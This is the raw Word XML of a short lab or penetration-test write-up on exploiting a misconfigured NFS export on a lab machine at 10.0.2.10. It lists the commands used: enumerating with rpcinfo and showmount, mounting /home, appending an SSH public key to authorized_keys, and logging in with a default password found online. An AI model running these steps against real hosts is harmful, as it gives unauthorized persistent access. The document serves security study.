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9322D6" w14:textId="67551977" w:rsidR="00C15C35" w:rsidRDefault="00F61C2D">
      <w:r>
        <w:t>NFS Exported Share Information Disclosure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="749C2017" w14:textId="53C00683" w:rsidR="00F61C2D" w:rsidRPr="00CA113D" w:rsidRDefault="00F61C2D" w:rsidP="00F61C2D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA113D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Commands used</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> ()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA113D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2487F902" w14:textId="77777777" w:rsidR="00F61C2D" w:rsidRDefault="00F61C2D" w:rsidP="00F61C2D">
      <w:r>
        <w:t>$ sudo -i</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6895E0" w14:textId="302570DA" w:rsidR="00F61C2D" w:rsidRDefault="00F61C2D" w:rsidP="00F61C2D">
      <w:r>
        <w:t xml:space="preserve">$ rpcinfo -p 10.0.2.10 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="276725C0" w14:textId="2EFCA117" w:rsidR="00BB10F8" w:rsidRDefault="00BB10F8" w:rsidP="00F61C2D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2CBCA947" wp14:editId="25AEA08A">
            <wp:extent cx="2447925" cy="3886081"/>
            <wp:effectExtent l="0" t="0" r="0" b="635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4"/>
                    <a:srcRect l="4985" t="20207" r="81719" b="13989"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2452901" cy="38939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4A652D" w14:textId="77777777" w:rsidR="00F61C2D" w:rsidRDefault="00F61C2D" w:rsidP="00F61C2D">
      <w:r>
        <w:t>$ showmount -e 10.0.2.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53184F08" w14:textId="176609FE" w:rsidR="00F61C2D" w:rsidRDefault="00F61C2D" w:rsidP="00F61C2D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>$ ssh-keygen</w:t>
      </w:r>
      <w:r w:rsidR="00657C99">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00657C99">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-t rsa -b 4096</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409A0394" w14:textId="34888920" w:rsidR="005321DF" w:rsidRDefault="005321DF" w:rsidP="00F61C2D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75016059" wp14:editId="41A6971C">
            <wp:extent cx="2705100" cy="2776917"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445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/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId5"/>
                    <a:srcRect l="4819" t="17616" r="76402" b="22281"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2712029" cy="27840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9CBE05" w14:textId="77777777" w:rsidR="00F61C2D" w:rsidRDefault="00F61C2D" w:rsidP="00F61C2D">
      <w:r>
        <w:t>$ ls -l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2632B709" w14:textId="77777777" w:rsidR="00F61C2D" w:rsidRDefault="00F61C2D" w:rsidP="00F61C2D">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>$ mkdir /tmp/r00t</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A4995C" w14:textId="3714AB3C" w:rsidR="00F61C2D" w:rsidRDefault="00F61C2D" w:rsidP="00F61C2D">
      <w:r>
        <w:t>$  mount -t nfs 10.0.2.10:/home /tmp/r00t/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF9EC86" w14:textId="5376D59A" w:rsidR="00EA45B0" w:rsidRDefault="00EA45B0" w:rsidP="00F61C2D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1327E82B" wp14:editId="64AF7452">
            <wp:extent cx="2945218" cy="2638425"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0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 rotWithShape="1">
                    <a:blip r:embed="rId6"/>
                    <a:srcRect l="4819" t="19171" r="79227" b="36269"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2952711" cy="26451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ED69E9" w14:textId="50592D6D" w:rsidR="00945572" w:rsidRDefault="00F161D7" w:rsidP="00F61C2D">
      <w:r>
        <w:t>Mount successful</w:t>
      </w:r>
      <w:r w:rsidR="009F045F">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9BFDAA" w14:textId="6FFBEA62" w:rsidR="00F61C2D" w:rsidRDefault="00F61C2D" w:rsidP="00F61C2D">
      <w:r>
        <w:t>$ cat ~/.ssh/id_rsa.pub &gt;&gt; /tmp/r00t/.ssh/authorized_keys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3240A6DE" w14:textId="2D3B6111" w:rsidR="00B00369" w:rsidRDefault="00223990" w:rsidP="00F61C2D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1507CD64" wp14:editId="5FC31641">
            <wp:extent cx="3743325" cy="3435654"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="7" name="Picture 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medium confidence"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId7"/>
                    <a:srcRect l="19776" t="16062" r="55961" b="14508"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3751562" cy="34432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5F5926" w14:textId="77777777" w:rsidR="00F61C2D" w:rsidRDefault="00F61C2D" w:rsidP="00F61C2D">
      <w:r>
        <w:t>$ umount /tmp/r00t</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72561E80" w14:textId="47CF3867" w:rsidR="00223990" w:rsidRDefault="00223990" w:rsidP="00F61C2D">
      <w:r>
        <w:t>In another terminal:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AEBD10F" w14:textId="2BDB1AC8" w:rsidR="00F61C2D" w:rsidRDefault="00F61C2D" w:rsidP="00F61C2D">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">$ ssh </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidR="006059CC" w:rsidRPr="006278F1">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>osboxes@10.0.2.10</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4686635C" w14:textId="11C8CF3A" w:rsidR="006059CC" w:rsidRPr="00267DA6" w:rsidRDefault="006059CC" w:rsidP="00F61C2D">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00267DA6">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>Asked for password, using the osint info</w:t>
      </w:r>
      <w:r w:rsidR="00267DA6">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> found</w:t>
      </w:r>
      <w:r w:rsidRPr="00267DA6">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> online</w:t>
      </w:r>
      <w:r w:rsidR="00267DA6" w:rsidRPr="00267DA6">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>: osboxes.org</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70018C5B" w14:textId="1BB42263" w:rsidR="00267DA6" w:rsidRDefault="00267DA6" w:rsidP="00F61C2D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6897EC94" wp14:editId="33FAC47A">
            <wp:extent cx="3419475" cy="2034371"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="6" name="Picture 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 with medium confidence"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId9"/>
                    <a:srcRect l="12298" t="20207" r="61445" b="31088"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3449652" cy="20523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92A70F" w14:textId="171C98BA" w:rsidR="00717F24" w:rsidRDefault="00717F24" w:rsidP="00F61C2D">
      <w:r>
        <w:t xml:space="preserve">This has allowed me access to many files and direct writeable access to directories and files alike. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB9CFB7" w14:textId="058A6335" w:rsidR="003074C3" w:rsidRDefault="003074C3" w:rsidP="00F61C2D"/>
    <w:p w14:paraId="46BED168" w14:textId="77777777" w:rsidR="00F61C2D" w:rsidRDefault="00F61C2D"/>
    <w:sectPr w:rsidR="00F61C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xMDA0NjO0MLEwNTNW0lEKTi0uzszPAykwrgUARiY8uywAAAA="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00F61C2D"/>
    <w:rsid w:val="00223990"/>
    <w:rsid w:val="00267DA6"/>
    <w:rsid w:val="002913EA"/>
    <w:rsid w:val="003074C3"/>
    <w:rsid w:val="003F5C3B"/>
    <w:rsid w:val="005321DF"/>
    <w:rsid w:val="006059CC"/>
    <w:rsid w:val="00657C99"/>
    <w:rsid w:val="00717F24"/>
    <w:rsid w:val="008C72FB"/>
    <w:rsid w:val="00945572"/>
    <w:rsid w:val="009F045F"/>
    <w:rsid w:val="00A55121"/>
    <w:rsid w:val="00A833C7"/>
    <w:rsid w:val="00B00369"/>
    <w:rsid w:val="00B934C3"/>
    <w:rsid w:val="00BB10F8"/>
    <w:rsid w:val="00C15C35"/>
    <w:rsid w:val="00EA45B0"/>
    <w:rsid w:val="00F161D7"/>
    <w:rsid w:val="00F61C2D"/>
    <w:rsid w:val="00F90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B3E3F"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{564E5E6A-352B-4429-BCB9-B0E13A0A07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074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74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sboxes@10.0.2.10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3</Pages>
  <Words>86</Words>
  <Characters>4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Etchells</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Victoria Etchells</cp:lastModifiedBy>
  <cp:revision>19</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-04-27T04:55:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-04-28T15:38:00Z</dcterms:modified>
</cp:coreProperties>
</file>